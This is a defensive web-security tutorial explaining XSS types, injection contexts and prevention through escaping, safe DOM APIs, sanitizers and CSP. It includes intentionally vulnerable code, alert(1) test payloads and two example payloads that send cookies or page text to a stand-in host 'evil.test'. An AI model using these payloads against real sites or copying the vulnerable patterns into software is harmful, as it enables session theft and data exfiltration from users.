Cross-site scripting, usually shortened to XSS, is one of those web security bugs that sounds old-school but still shows up everywhere. If you build web apps that display user-controlled content, you need to understand it. Not just the definition, but how it actually happens in real code.

The short version: XSS happens when an attacker gets your site to treat untrusted input as executable code in the browser. Usually that means JavaScript, but the real issue is broader than “someone injected a script tag.” The browser is parsing HTML, attributes, URLs, CSS, and script contexts differently, and if you put user data into the wrong place without the right protection, the attacker can make the page do things you never intended.

This tutorial walks through what XSS is, how it works, the main types, realistic examples, and how to prevent it without relying on wishful thinking.

What XSS actually means

The “cross-site” part of the name is a historical artifact. It’s really about injecting script into a trusted website so it runs in another user’s browser under that site’s origin.

That last part matters most.

If malicious JavaScript runs on example.com, the browser treats it like code from example.com. That means it may be able to:

  • read page content
  • make authenticated requests as the victim
  • perform actions in the app
  • steal non-HttpOnly tokens
  • keylog form input
  • rewrite the UI
  • exfiltrate sensitive data

A lot of people still think XSS is mostly about cookie theft. Sometimes it is, but modern XSS is often more about account takeover, API abuse, and in-browser fraud.

How XSS works at a high level

The attack flow is usually simple:

  1. The application accepts attacker-controlled input.
  2. That input is stored or reflected somewhere in the page.
  3. The browser interprets that data as code instead of plain text.
  4. The malicious code runs in the victim’s browser.

Here’s the key idea: the browser does not know your intentions. If you generate HTML like this:

<div>Welcome, USER_INPUT</div>

and USER_INPUT is:

<img src=x onerror=alert(1)>

the browser doesn’t think, “that was probably meant to be text.” It sees valid HTML and parses it as an image element with an event handler.

That’s XSS.

A first vulnerable example

Imagine a server-rendered page that greets a user based on a query parameter.

app.get('/search', (req, res) => {
  const q = req.query.q || '';
  res.send(`
    <html>
      <body>
        <h1>Search results</h1>
        <p>You searched for: ${q}</p>
      </body>
    </html>
  `);
});

Looks harmless. But if someone visits this URL:

/search?q=<script>alert('XSS')</script>

the response becomes:

<p>You searched for: <script>alert('XSS')</script></p>

The browser parses the script tag and executes it.

That’s a classic reflected XSS example: attacker input comes in with the request and gets reflected immediately in the response.

The three main types of XSS

1. Reflected XSS

Reflected XSS happens when malicious input is sent in a request and immediately rendered in the response.

Common sources:

  • search parameters
  • error messages
  • form fields echoed back after validation fails
  • URL fragments processed by client-side code

Typical attack pattern:

  • attacker crafts a malicious URL
  • victim clicks it
  • application reflects the payload into the page
  • browser executes it

Example payload:

https://example.com/search?q=<img src=x onerror=fetch('https://evil.test?c='+document.cookie)>

Reflected XSS often depends on social engineering because the victim has to click the link or submit the malicious input.

2. Stored XSS

Stored XSS is worse in many real-world cases. The attacker submits payloads that get saved somewhere, like a database, and later shown to other users.

Common storage points:

  • comments
  • forum posts
  • user profiles
  • support tickets
  • chat messages
  • admin dashboards showing logs or reports

Example vulnerable code:

app.post('/comments', (req, res) => {
  db.comments.insert({ text: req.body.comment });
  res.redirect('/post/123');
});

app.get('/post/123', async (req, res) => {
  const comments = await db.comments.find();
  const html = comments.map(c => `<li>${c.text}</li>`).join('');
  res.send(`<ul>${html}</ul>`);
});

If an attacker posts:

<script>fetch('https://evil.test/steal?d='+document.body.innerText)</script>

every visitor to that post may execute the payload.

Stored XSS is especially dangerous when low-privilege users can inject code that runs in high-privilege users’ browsers, like moderators or admins.

3. DOM-based XSS

DOM-based XSS happens entirely in the browser. The server might send a perfectly safe page, but client-side JavaScript reads untrusted data and writes it into a dangerous DOM sink.

Example:

const params = new URLSearchParams(location.search);
const name = params.get('name');
document.getElementById('output').innerHTML = `Hello ${name}`;

If the URL is:

/?name=<img src=x onerror=alert(1)>

then innerHTML turns attacker-controlled data into live HTML.

This is one of the most common modern XSS patterns because frontend apps do a lot of DOM manipulation, and developers often reach for innerHTML when they should use text-safe APIs.

Not all contexts are the same

This is where developers get burned. Escaping is not one universal thing. The right defense depends on where the data goes.

These are different contexts:

  • HTML element content
  • HTML attributes
  • JavaScript strings
  • CSS values
  • URL parameters

A payload that fails in one context may work in another.

Safe in HTML text, unsafe in attributes

Suppose you output user data here:

<div>${userInput}</div>

If properly HTML-escaped, that can be safe.

But now look at this:

<input value="${userInput}">

If you don’t escape quotes, an attacker can break out of the attribute:

" autofocus onfocus="alert(1)

Result:

<input value="" autofocus onfocus="alert(1)">

Now code executes when the field gets focus.

Dangerous JavaScript context

This is a very common mistake:

<script>
  const username = '${userInput}';
</script>

If userInput contains:

'; alert(1); //

the output becomes:

<script>
  const username = ''; alert(1); //';
</script>

That executes immediately.

Putting untrusted data inside script blocks is dangerous unless you use proper JavaScript-aware encoding or safer patterns like JSON serialization.

Real browser behavior attackers abuse

Attackers don’t need <script>alert(1)</script> specifically. There are lots of executable surfaces:

  • event handlers like onerror, onclick, onload
  • javascript: URLs
  • SVG content
  • malformed HTML that the browser repairs
  • DOM APIs like innerHTML, outerHTML, insertAdjacentHTML
  • template rendering bugs
  • unsafe markdown or rich text rendering

Example:

<div id="content"></div>
<script>
  const bio = new URLSearchParams(location.search).get('bio');
  document.getElementById('content').innerHTML = bio;
</script>

Payload:

<svg onload=alert(1)>

No script tag needed.

That’s why simplistic filters like “block the word script” are useless.

How to prevent XSS properly

You prevent XSS by treating all untrusted data as data, not markup or code.

1. Escape output based on context

This is the core rule.

If you put untrusted input into HTML text, HTML-escape it. If you put it into an attribute, attribute-escape it. If you put it into JavaScript, use JavaScript-safe serialization. If you put it into a URL, URL-encode it.

Bad:

res.send(`<p>${comment}</p>`);

Better:

res.send(`<p>${escapeHtml(comment)}</p>`);

A minimal HTML escape function might look like:

function escapeHtml(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

That helps for HTML text content. But don’t pretend one helper solves every context. It doesn’t.

2. Use safe DOM APIs

On the frontend, prefer APIs that insert text, not HTML.

Unsafe:

element.innerHTML = userInput;

Safe:

element.textContent = userInput;

Unsafe:

element.insertAdjacentHTML('beforeend', userInput);

Safer pattern:

const div = document.createElement('div');
div.textContent = userInput;
element.appendChild(div);

If you truly need to allow limited HTML, use a sanitizer designed for that purpose.

3. Sanitize rich HTML when you must allow it

Sometimes users really do need formatting: bold text, links, lists, maybe images. In that case, escaping everything may not be acceptable. You need sanitization, meaning remove dangerous elements and attributes while keeping an allowed subset.

This is hard to do correctly by hand. Use a well-maintained HTML sanitizer. Don’t invent your own regex-based “filter.”

Because yes, regex-based HTML sanitizers are usually security theater.

4. Avoid inline JavaScript

This pattern is fragile:

<button onclick="save('${userInput}')">Save</button>

Safer approach:

<button id="saveBtn">Save</button>
<script>
  const value = USER_DATA_FROM_JSON;
  document.getElementById('saveBtn').addEventListener('click', () => {
    save(value);
  });
</script>

The more you separate data from code, the fewer weird parser edge cases you have to think about.

5. Use templating frameworks correctly

Modern frameworks help, but only if you stay on the paved road.

Generally safe by default:

  • React rendering values in JSX
  • Vue interpolations
  • server-side template engines with auto-escaping enabled

Generally dangerous escape hatches:

  • React dangerouslySetInnerHTML
  • Vue v-html
  • Angular bypass security APIs
  • disabling template auto-escaping
  • custom rendering helpers that concatenate raw HTML

Frameworks reduce XSS risk. They do not eliminate it.

6. Deploy Content Security Policy

CSP is not your primary fix, but it’s a powerful backup layer. A strong CSP can make many XSS payloads much harder to exploit by restricting script execution.

A basic example:

Content-Security-Policy:
  default-src 'self';
  script-src 'self' 'nonce-random123';
  object-src 'none';
  base-uri 'self';

Best results come from nonce-based CSP and avoiding inline scripts. If your app depends on tons of inline JS and broad third-party script access, your CSP will end up too weak to help much.

7. Use HttpOnly cookies, but understand the limits

If session cookies are marked HttpOnly, JavaScript can’t read them directly. That’s good.

But XSS can still:

  • perform actions as the user
  • read sensitive page data
  • call same-origin APIs
  • change account settings
  • exfiltrate CSRF tokens from the DOM if exposed there

So yes, use HttpOnly cookies. No, they do not “solve” XSS.

A secure rewrite of a vulnerable example

Vulnerable frontend code:

const name = new URLSearchParams(location.search).get('name');
document.getElementById('greeting').innerHTML = `Hello, ${name}`;

Safer version:

const name = new URLSearchParams(location.search).get('name') || 'guest';
document.getElementById('greeting').textContent = `Hello, ${name}`;

Vulnerable server-side rendering:

res.send(`<p>${req.body.message}</p>`);

Safer version:

res.send(`<p>${escapeHtml(req.body.message)}</p>`);

How to test for XSS

Start simple. Put payloads anywhere user input is rendered and see what happens.

Common test payloads:

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
" onmouseover="alert(1)
';alert(1);//

Then inspect where your application puts that data:

  • HTML body?
  • attribute?
  • script block?
  • URL?
  • DOM insertion via JavaScript?

The payload needs to match the context. If you want a quick external check, Scan your site for XSS vulnerabilities and other security issues at headertest.com - free, instant, no signup required.

Final thoughts

XSS is not just “someone put a script tag in a form.” It’s a browser parsing problem caused by mixing untrusted data with executable contexts.

The practical rule is simple:

  • escape by output context
  • use text-safe DOM APIs
  • sanitize allowed HTML with a real sanitizer
  • avoid inline script patterns
  • add CSP as defense in depth

If you remember one thing, make it this: input validation is not the main XSS defense. Output handling is. The vulnerability happens at the moment untrusted data is rendered into a context the browser can execute.

That’s where you win or lose.